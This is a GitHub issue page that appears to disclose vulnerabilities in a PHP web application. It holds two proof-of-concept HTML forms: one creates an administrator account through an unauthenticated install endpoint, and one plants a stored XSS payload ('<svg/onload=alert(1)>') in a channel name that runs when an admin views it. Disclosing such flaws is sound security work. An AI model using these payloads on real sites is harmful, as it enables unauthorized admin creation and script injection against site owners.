We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1/index.php?/install/installation/createuserinfo" method="POST"> <input type="hidden" name="siteurl" value="http://127.0.0.1/" /> <input type="hidden" name="superuser" value="test" /> <input type="hidden" name="pwd" value="test123" /> <input type="hidden" name="verifypassword" value="test123" /> <input type="hidden" name="email" value="12@qq.com" /> <input type="submit" value="Submit request" /> </form> </body> </html>
2.add data without login and execute evil code.
Change the channel_id then Open html page even without login.When admin access /index.php?/manage/channel ,the evil code will execute.
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1/index.php?/manage/channel/modifychannel" method="POST"> <input type="hidden" name="channel_id" value="979" /> <input type="hidden" name="channel_name" value="xss><svg/onload=alert(1)>" /> <input type="hidden" name="platform" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html>
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Just update the url without login, the test user will be create.
2.add data without login and execute evil code.
Change the channel_id then Open html page even without login.When admin access /index.php?/manage/channel ,the evil code will execute.
The text was updated successfully, but these errors were encountered: